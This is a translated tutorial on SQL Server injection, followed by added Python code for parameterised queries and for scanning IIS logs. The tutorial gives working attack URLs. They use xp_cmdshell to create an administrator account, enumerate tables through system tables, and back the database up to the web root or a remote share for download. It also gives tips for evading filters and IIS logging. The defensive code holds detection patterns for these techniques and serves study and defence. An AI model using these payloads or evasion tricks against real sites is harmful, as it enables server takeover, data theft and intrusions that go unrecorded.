Section 1: Injecting into a SQL Server database through the system tables

SQL Server is a powerful database system that is closely tied to the operating system. This brings developers great convenience, but on the other hand it also hands the injector a springboard. Let's look at several concrete examples:

1. http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon separates two statements, and -- marks what follows as a comment, so SQL Server splits this into two statements: first it SELECTs the record with id=1, then it executes the stored procedure xp_cmdshell. This stored procedure is used to call system commands, so the net command creates a Windows account with user name "name" and password "password". Next:

2. http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--

This adds the new account "name" to the administrators group; in no time you hold the highest privilege on the system! Of course, this method only works when the database connection uses sa; otherwise there is no permission to call xp_cmdshell.

3. http://site/url.asp?id=1;;and db_name()>0

There is a similar example earlier, and user>0, which obtains the connection's user name. db_name() is another system variable; it returns the name of the connected database.

4. http://site/url.asp?id=1;backup database DatabaseName to disk='c:/inetpub/wwwroot/1.db';--

This one is quite vicious: using the database name obtained in 3, plus an absolute path exposed by some IIS error message, the database is backed up into the web directory and then downloaded whole over HTTP, so every administrator and user password is laid bare! When the absolute path is not known, backing up to a network address (such as //202.96.xx.xx/share/1.db) is also possible, but the success rate is not high.

5. http://site/url.asp?id=1;;and (select top 1 name from sysobjects where xtype='u' and status>0)>0

As said before, sysobjects is a SQL Server system table that stores all table names, views, constraints and other objects; xtype='u' and status>0 selects the tables created by the user. The statement above takes out the first table name and compares it with 0, so that the error message exposes the table name. How to get the second and third table names? We leave that for our clever readers to think about.
6. http://site/url.asp?id=1;;and (select top 1 col_name(object_id('TableName'),1)

After getting the table name from 5, object_id('TableName') gets the table's internal ID, and col_name(TableID,1) is the name of the table's first field; replacing 1 with 2, 3, 4 ... gets the field names of the queried table one by one.

The six points above are the crystallisation of my hard study of SQL Server injection. As you can see, how well you understand SQL Server directly affects the success rate and the speed of guessing. After studying SQL Server injection I also improved a great deal at development; heh, perhaps security and development complement each other after all.

Section 2: Bypassing program restrictions to keep injecting

As mentioned in the introductory section, many people like to test for injection vulnerabilities with the ' character, so many people also "prevent" injection by filtering the ' character. This may stop some beginners' attacks, but someone more familiar with SQL can still use the related functions to get around the program's restrictions.

In the "SQL Injection" section the statements I used were optimised so that they contain no single quotes; in "Injecting into a SQL Server database through the system tables" some statements do contain a ' character. Let's take an example to see how to transform such statements. A simple case is where xtype='u': the ASCII code of the character u is 85, so where xtype=char(85) can be used instead. If the characters are Chinese, for example where name='用户' (the Chinese word for "user"), it can be replaced with where name=nchar(29992)+nchar(25143).

Section 3: Lessons from experience

1. Some people filter keywords such as select but forget about letter case, so everyone can try a different capitalisation such as Select.

2. When you can't guess the field name, take a look at the website's login form; generally the field names are the same as the names of the form's input boxes.

3. Special note: a + in the address bar is interpreted as a space when it reaches the program, %2B is interpreted as +, and %25 as %; see the material on URLEncode for details.

4. When injecting with the GET method, IIS records every string you submit, while it does not record the POST method, so where a URL can be used with POST, try not to use GET.

5. When guessing against Access only the character-by-character ASCII decoding method is available; SQL Server can use that method too, only the differences between the two need attention, but if SQL Server's error messages can be used to expose the value, efficiency and accuracy improve greatly.

Defence

SQL injection vulnerabilities can be described as "a thousand-mile dyke collapsing through an ant hole": they are extremely common online, usually because the programmer does not understand injection, or the program's filtering is not strict, or a parameter was forgotten and is never checked.
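The root cause named in the defence paragraph is a query-string parameter pasted straight into the SQL text. The following is an added example, not code from the original article; it uses Python and an in-memory SQLite table as a stand-in for the ASP page's url.asp?id=... lookup (the news table, its rows and the function names are all assumed), and shows the vulnerable pattern beside the checked, parameterised form, including how the unchecked form passes the raw database error through to the client:

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the site's database; the table and
    # rows are example data, not taken from the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn

def lookup_unsafe(conn, id_param):
    # The pattern behind url.asp?id=...: the query-string value is pasted into
    # the SQL text, so an 'and ...' clause supplied by the client runs as SQL.
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def lookup_safe(conn, id_param):
    # The two checks the defence paragraph says are usually missing: the
    # parameter is validated as the integer it is supposed to be, and the value
    # is bound through a placeholder instead of concatenated, so it can never
    # be read as SQL.
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer")
    return conn.execute("SELECT id, title FROM news WHERE id=?",
                        (id_value,)).fetchall()

def leaked_error(conn, id_param):
    # The database error text the unsafe path lets through to the client (on
    # the ASP site it is what the IIS error page would display), or None if
    # the query ran without error.
    try:
        lookup_unsafe(conn, id_param)
    except sqlite3.Error as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    conn = make_db()
    print(lookup_unsafe(conn, "1"), lookup_safe(conn, "1"))
    print(leaked_error(conn, "1 and db_name()>0"))  # the probe from example 3
    try:
        lookup_safe(conn, "1 and db_name()>0")
    except ValueError as exc:
        print("rejected before reaching the database:", exc)
```

With SQLite the leaked text is "no such function: db_name"; on SQL Server it would be the conversion error the article relies on, which is why the safe path rejects the value before any database call.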
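Items 1, 3 and 4 of Section 3 together describe what a defender has to work with: IIS records GET query strings, the + and %XX encoding has to be undone before the string is read, and keyword filters that ignore letter case or the char()/nchar() substitution from Section 2 are bypassed. The following is an added example, not part of the original article; it scans constructed IIS-style log lines (the format, addresses and times are made up) after decoding and lower-casing each query string, and flags the techniques the article describes:

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (example data, not a real server's log).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2004-01-01 10:00:01 10.0.0.5 GET /url.asp id=1 200
2004-01-01 10:00:02 10.0.0.5 GET /url.asp id=1;exec+master..xp_cmdshell+%22net+user+name+password+/add%22-- 500
2004-01-01 10:00:03 10.0.0.5 GET /url.asp id=1;;and+db_name()%3E0 500
2004-01-01 10:00:04 10.0.0.5 GET /url.asp id=1;;and+(selecT+top+1+name+from+sysobjects+where+xtype=char(85)+and+status%3E0)%3E0 500
2004-01-01 10:00:05 10.0.0.5 GET /news.asp id=42 200
2004-01-01 10:00:06 10.0.0.5 GET /url.asp id=1;backup+database+site+to+disk=%27c:/inetpub/wwwroot/1.db%27;-- 500
"""

# Patterns are applied to the URL-decoded, lower-cased query string, so the
# selecT capitalisation trick and the char()/nchar() quote substitution from
# the text are matched rather than bypassed.
PATTERNS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell"),
    "system_table": re.compile(r"\bsysobjects\b|\bcol_name\s*\(|\bobject_id\s*\("),
    "system_variable": re.compile(r"\bdb_name\s*\(|\buser\s*>\s*0"),
    "backup_to_disk": re.compile(r"\bbackup\s+database\b"),
    "char_encoding": re.compile(r"\bn?char\s*\(\s*\d+\s*\)"),
    "stacked_query": re.compile(r";\s*(exec|select|backup|insert|update|delete)\b"),
}

def normalise(query):
    # The decoding from item 3: '+' becomes a space, %2B becomes '+', %25
    # becomes '%'; then lower-case so item 1's mixed-case keywords match.
    return unquote_plus(query).lower()

def scan_log(text):
    # Returns (line number, uri-stem, sorted pattern names) for each GET
    # request whose query string matches. POST bodies are not in the log
    # (item 4), so only what IIS actually records is examined.
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 7 or parts[3] != "GET":
            continue
        names = sorted(n for n, p in PATTERNS.items() if p.search(normalise(parts[5])))
        if names:
            hits.append((lineno, parts[4], names))
    return hits

if __name__ == "__main__":
    for lineno, stem, names in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {stem} -> {', '.join(names)}")
```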